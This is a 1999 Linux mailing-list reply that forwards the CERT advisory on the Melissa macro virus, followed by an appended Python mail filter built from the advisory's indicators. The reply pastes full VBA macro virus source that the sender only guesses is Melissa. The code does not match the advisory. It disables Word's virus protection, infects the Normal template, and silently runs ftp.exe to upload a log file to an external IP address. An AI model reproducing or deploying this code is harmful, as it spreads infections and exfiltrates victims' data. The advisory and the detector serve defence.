
RE: [linux-team] FW: CERT Advisory CA-99.04 - Melissa Macro Virus



Hello... personally I had to deal with this virus (I think it is this one)
last week... it is a dumb macro virus written in VB, which sends the licence
info (name and so on) to an FTP site...

PS: the virus source is in the attached file...

 <<Virus.txt>> 



> ----------
> From: 	Verloove, Olivier[SMTP:olivier_verloove@merck.com]
> Reply-To: 	linux-team@rtfm.be
> Date:	Saturday 3 April 1999 16:29
> To:	'Linux Team'
> Subject:	[linux-team] FW: CERT Advisory CA-99.04 - Melissa Macro Virus
> 
> For those who want details on the Melissa virus... here is a detailed
> description.
> 
> In any case, it only attacks Outlook or Exchange users who use Word97 (or
> 2000) as their editor. It should not affect Linux users too much ;-)
> 
> PS: I read on Slashdot that the American police had arrested a suspect
> (a New Jersey resident).
> 
> Olivier
> 
> ----------
> From:  CERT Advisory [SMTP:cert-advisory@cert.org]
> Sent:  Saturday, 27 Mar, 1999 13:05
> To:  cert-advisory@coal.cert.org
> Subject:  CERT Advisory CA-99.04 - Melissa Macro Virus
> 
> CERT Advisory CA-99-04-Melissa-Macro-Virus
> Original issue date: Saturday March 27 1999
> Last Revised: Saturday March 27, 1999
> 
> Systems Affected
> * Machines with Microsoft Word 97 or Word 2000
> * Any mail handling system could experience performance problems or a
>   denial of service as a result of the propagation of this macro virus.
> 
> Overview
> 
> At approximately 2:00 PM GMT-5 on Friday March 26 1999 we began receiving
> reports of a Microsoft Word 97 and Word 2000 macro virus which is
> propagating via email attachments. The number and variety of reports we
> have received indicate that this is a widespread attack affecting a
> variety of sites.
> 
> Our analysis of this macro virus indicates that human action (in the form
> of a user opening an infected Word document) is required for this virus
> to propagate. It is possible that under some mailer configurations, a
> user might automatically open an infected document received in the form
> of an email attachment. This macro virus is not known to exploit any new
> vulnerabilities. While the primary transport mechanism of this virus is
> via email, any way of transferring files can also propagate the virus.
> 
> Anti-virus software vendors have called this macro virus the Melissa
> macro or W97M_Melissa virus.
> I. Description
> 
> The Melissa macro virus propagates in the form of an email message
> containing an infected Word document as an attachment. The transport
> message has most frequently been reported to contain the following
> Subject header:
> 
>     Subject: Important Message From <name>
> 
> Where <name> is the full name of the user sending the message.
> 
> The body of the message is a multipart MIME message containing two
> sections. The first section of the message (Content-Type: text/plain)
> contains the following text:
> 
>     Here is that document you asked for ... don't show anyone else ;-)
> 
> The next section (Content-Type: application/msword) was initially
> reported to be a document called "list.doc". This document contains
> references to pornographic web sites. As this macro virus spreads we are
> likely to see documents with other names. In fact, under certain
> conditions the virus may generate attachments with documents created by
> the victim.
> 
> When a user opens an infected .doc file with Microsoft Word97 or
> Word2000, the macro virus is immediately executed if macros are enabled.
> 
> Upon execution, the virus first lowers the macro security settings to
> permit all macros to run when documents are opened in the future.
> Therefore, the user will not be notified when the virus is executed in
> the future.
> 
> The macro then checks to see if the registry key
> 
>     "HKEY_Current_User\Software\Microsoft\Office\Melissa?"
> 
> has a value of "... by Kwyjibo". If that registry key does not exist or
> does not have a value of "... by Kwyjibo", the virus proceeds to
> propagate itself by sending an email message in the format described
> above to the first 50 entries in every MAPI address book readable by the
> user executing the macro. Keep in mind that if any of these email
> addresses are mailing lists, the message will be delivered to everyone on
> the mailing lists. In order to successfully propagate, the affected
> machine must have Microsoft Outlook installed; however, Outlook does not
> need to be the mailer used to read the message.
> 
> Next, the macro virus sets the value of the registry key to "... by
> Kwyjibo". Setting this registry key causes the virus to only propagate
> once per session. If the registry key does not persist through sessions,
> the virus will propagate as described above once per every session when
> a user opens an infected document. If the registry key persists through
> sessions, the virus will no longer attempt to propagate even if the
> affected user opens an infected document.
> 
> The macro then infects the Normal.dot template file. By default, all Word
> documents utilize the Normal.dot template; thus, any newly created Word
> document will be infected. Because unpatched versions of Word97 may trust
> macros in templates the virus may execute without warning. For more
> information please see:
> 
>     http://www.microsoft.com/security/bulletins/ms99-002.asp
> 
> Finally, if the minute of the hour matches the day of the month at this
> point, the macro inserts into the current document the message
> "Twenty-two points, plus triple-word-score, plus fifty points for using
> all my letters. Game's over. I'm outta here."
> 
> Note that if you open an infected document with macros disabled and look
> at the list of macros in this document, neither Word97 nor Word2000 list
> the macro. The code is actually VBA (Visual Basic for Applications) code
> associated with the "document.open" method. You can see the code by going
> into the Visual Basic editor.
> 
> If you receive one of these messages, keep in mind that the message came
> from someone who is affected by this virus and they are not necessarily
> targeting you. We encourage you to contact any users from which you have
> received such a message. Also, we are interested in understanding the
> scope of this activity; therefore, we would appreciate if you would
> report any instance of this activity to us according to our Incident
> Reporting Guidelines document available at:
> 
>     http://www.cert.org/tech_tips/incident_reporting.html
> II. Impact
> 
> * Users who open an infected document in Word97 or Word2000 with macros
>   enabled will infect the Normal.dot template causing any documents
>   referencing this template to be infected with this macro virus. If the
>   infected document is opened by another user, the document, including
>   the macro virus, will propagate. Note that this could cause the user's
>   document to be propagated instead of the original document, and
>   thereby leak sensitive information.
> * Indirectly, this virus could cause a denial of service on mail
>   servers. Many large sites have reported performance problems with
>   their mail servers as a result of the propagation of this virus.
> 
> III. Solutions
> 
> * Block messages with the signature of this virus at your mail transfer
>   agents.
> 
>   With Sendmail
> 
>   Nick Christenson of sendmail.com provided information about configuring
>   sendmail to filter out messages that may contain the Melissa virus.
>   This information is available from the following URL:
> 
>   ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-melissa-filter.txt
> 
> * Utilize virus scanners
> 
>   Most virus scanning tools will detect and clean macro viruses. In order
>   to detect and clean current viruses you must keep your scanning tools
>   up to date with the latest definition files.
> 
>   * McAfee / Network Associates
>     http://vil.mcafee.com/vil/vm10120.asp
>     http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp
>   * Symantec
>     http://www.symantec.com/avcenter/venc/data/mailissa.html
>   * Trend Micro
>     http://housecall.antivirus.com/smex_housecall/technotes.html
> 
> * Encourage users at your site to disable macros in Microsoft Word
> 
>   Notify all of your users of the problem and encourage them to disable
>   macros in Word. You may also wish to encourage users to disable macros
>   in any product that contains a macro language as this sort of problem
>   is not limited to Microsoft Word.
> 
>   In Word97 you can disable automatic macro execution (click
>   Tools/Options/General then turn on the 'Macro virus protection'
>   checkbox). In Word2000 macro execution is controlled by a security
>   level variable similar to Internet Explorer (click on
>   Tools/Macro/Security and choose High, Medium, or Low). In that case,
>   'High' silently ignores the VBA code, Medium prompts in the way Word97
>   does to let you enable or disable the VBA code, and 'Low' just runs it.
> 
>   Word2000 supports Authenticode on the VB code. In the 'High' setting
>   you can specify sites that you trust and code from those sites will
>   run.
> 
> * General protection from Word Macro Viruses
> 
>   For information about macro viruses in general, we encourage you to
>   review the document "Free Macro AntiVirus Techniques" by Chengi Jimmy
>   Kuo which is available at:
> 
>   http://www.nai.com/services/support/vr/free.asp
> Acknowledgements
> 
> We would like to thank Jimmy Kuo of Network Associates, Eric Allman and
> Nick Christenson of sendmail.com, Dan Schrader of Trend Micro, and Jason
> Garms and Karan Khanna of Microsoft for providing information used in
> this advisory.
> 
> Additionally we would like to thank the many sites who reported this
> activity.
> 	
> ______________________________________________________________________
> 
> This document is available from:
> http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html
> 
> ______________________________________________________________________
> 
> CERT/CC Contact Information
> Email: cert@cert.org
> Phone: +1 412-268-7090 (24-hour hotline)
> Fax: +1 412-268-6989
> Postal address:
>     CERT Coordination Center
>     Software Engineering Institute
>     Carnegie Mellon University
>     Pittsburgh PA 15213-3890
>     U.S.A.
> 
> CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
> Monday through Friday; they are on call for emergencies during other
> hours, on U.S. holidays, and on weekends.
> 
> Using encryption
> We strongly urge you to encrypt sensitive information sent by email. Our
> public PGP key is available from http://www.cert.org/CERT_PGP.key . If
> you prefer to use DES, please call the CERT hotline for more information.
> 
> Getting security information
> CERT publications and other security information are available from our
> web site http://www.cert.org/ .
> To be added to our mailing list for advisories and bulletins, send email
> to cert-advisory-request@cert.org and include SUBSCRIBE your-email-address
> in the subject of your message.
> 
> Copyright 1999 Carnegie Mellon University.
> Conditions for use, disclaimers, and sponsorship information can be found
> in http://www.cert.org/legal_stuff.html .
> * "CERT" and "CERT Coordination Center" are registered in the U.S.
>   Patent and Trademark Office
> ______________________________________________________________________
> 
> NO WARRANTY
> Any material furnished by Carnegie Mellon University and the Software
> Engineering Institute is furnished on an "as is" basis. Carnegie Mellon
> University makes no warranties of any kind, either expressed or implied
> as to any matter including, but not limited to, warranty of fitness for
> a particular purpose or merchantability, exclusivity or results obtained
> from use of the material. Carnegie Mellon University does not make any
> warranty of any kind with respect to freedom from patent, trademark, or
> copyright infringement.
> ______________________________________________________________________
> 
> Revision History
> ---------
> This message was sent by Majordomo 1.94.3. Please report problems to
> manu@rtfm.be. If you want to be deleted from the list, send a mail to
> majordomo@rtfm.be with "unsubscribe linux-team" in the body.
> 
Private Sub Document_Close()

On Error Resume Next

Const Marker = "<- this is a marker!"

'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String

'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)


'Switch the VirusProtection OFF
Options.VirusProtection = False


  If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
  
    If DocumentInfected = True Then
      LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
    ElseIf NormalTemplateInfected = True Then
      LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
    End If
    
    LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
    
    For i = 1 To 4
      LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
    Next i
    LogFile = "C:\hsf" & LogFile & ".sys"
    
    Open LogFile For Output As #1
    Print #1, LogData
    Close #1
    
    Open "c:\netldx.vxd" For Output As #1
    Print #1, "o 209.201.88.110"
    Print #1, "user anonymous"
    Print #1, "pass itsme@"
    Print #1, "cd incoming"
    Print #1, "ascii"
    Print #1, "put " & LogFile
    Print #1, "quit"
    Close #1
    
    Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
    
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
    
  End If


'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
   
   
  'Infect the NormalTemplate
  If DocumentInfected = True Then
  
    SaveNormalTemplate = NormalTemplate.Saved
  
    OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)

    
    'Write a log file of this NormalTemplate infection
    For i = 1 To Len(Application.UserAddress)
      If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
        If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
          UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
        End If
      Else
        UserAddress = UserAddress & Chr(13) & "' "
      End If
    Next i

    OurCode = OurCode & Chr(13) & _
              "' " & Format(Time, "hh:mm:ss AMPM - ") & _
                     Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
              "' " & Application.UserName & Chr(13) & _
              "' " & UserAddress & Chr(13)


    nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
    nt.CodeModule.AddFromString OurCode
    
    If SaveNormalTemplate = True Then NormalTemplate.Save
    
  End If


  'Infect the ActiveDocument
  If NormalTemplateInfected = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
  
    SaveDocument = ActiveDocument.Saved
    
    OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)

    ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
    ad.CodeModule.AddFromString OurCode
    
    If SaveDocument = True Then ActiveDocument.Save
      
  End If
  
    
End If

End Sub
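The MTA-side block that Section III of the forwarded advisory recommends, built only from the transport signature Section I describes (the Subject header, the text/plain body and the application/msword part). This is an added example, not the sendmail filter the advisory links to and not code from the thread; both messages are constructed samples and the example.invalid addresses are placeholders.

```python
import re
from email import message_from_string

# Indicators from Section I of CA-99-04 (the advisory quoted in the thread).
SUBJECT_RE = re.compile(r"^Important Message From .+", re.IGNORECASE)
BODY_MARKER = "Here is that document you asked for"


def melissa_indicators(raw):
    """Return which of the three advisory indicators the raw message shows."""
    msg = message_from_string(raw)
    hits = {"subject": bool(SUBJECT_RE.match(msg.get("Subject", "").strip())),
            "body": False, "msword": False}
    for part in msg.walk():  # visits the container and every MIME leaf
        ctype = part.get_content_type()
        if ctype == "text/plain":
            text = (part.get_payload(decode=True) or b"").decode("latin-1", "replace")
            hits["body"] = hits["body"] or BODY_MARKER in text
        elif ctype == "application/msword":
            hits["msword"] = True
    return hits


def is_melissa_candidate(raw):
    """MTA block rule: the subject pattern plus the body text or a .doc part.
    A .doc attachment alone is ordinary traffic and is not blocked."""
    h = melissa_indicators(raw)
    return h["subject"] and (h["body"] or h["msword"])


# Constructed sample in the shape Section I describes (no real document inside).
SAMPLE_INFECTED = """\
From: alice@example.invalid
Subject: Important Message From Alice Example
Content-Type: multipart/mixed; boundary="XX"

--XX
Content-Type: text/plain

Here is that document you asked for ... don't show anyone else ;-)
--XX
Content-Type: application/msword; name="list.doc"

dummy
--XX--
"""

# Constructed benign control: same .doc attachment, ordinary subject and text.
SAMPLE_BENIGN = SAMPLE_INFECTED.replace(
    "Important Message From Alice Example", "Q1 report").replace(
    "Here is that document you asked for ... don't show anyone else ;-)",
    "Attached is the Q1 report.")
```

Call `melissa_indicators(SAMPLE_INFECTED)` to see all three indicators hit, and `is_melissa_candidate(SAMPLE_BENIGN)` to confirm that a plain .doc attachment is left alone.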